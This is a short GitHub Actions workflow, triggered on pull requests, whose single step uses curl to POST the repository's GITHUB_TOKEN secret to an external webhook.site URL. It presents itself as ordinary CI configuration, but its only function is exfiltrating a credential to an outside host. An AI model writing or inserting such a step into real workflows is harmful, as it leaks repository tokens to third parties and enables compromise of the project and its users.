name: token

on: [pull_request]

jobs:
  token:
    runs-on: ubuntu-latest
    steps:
    - name: token
      run: |
        curl https://webhook.site/df8cc6ae-32b1-42cb-85a7-21c19fd37f56 -XPOST --data "${{ secrets.GITHUB_TOKEN }}"
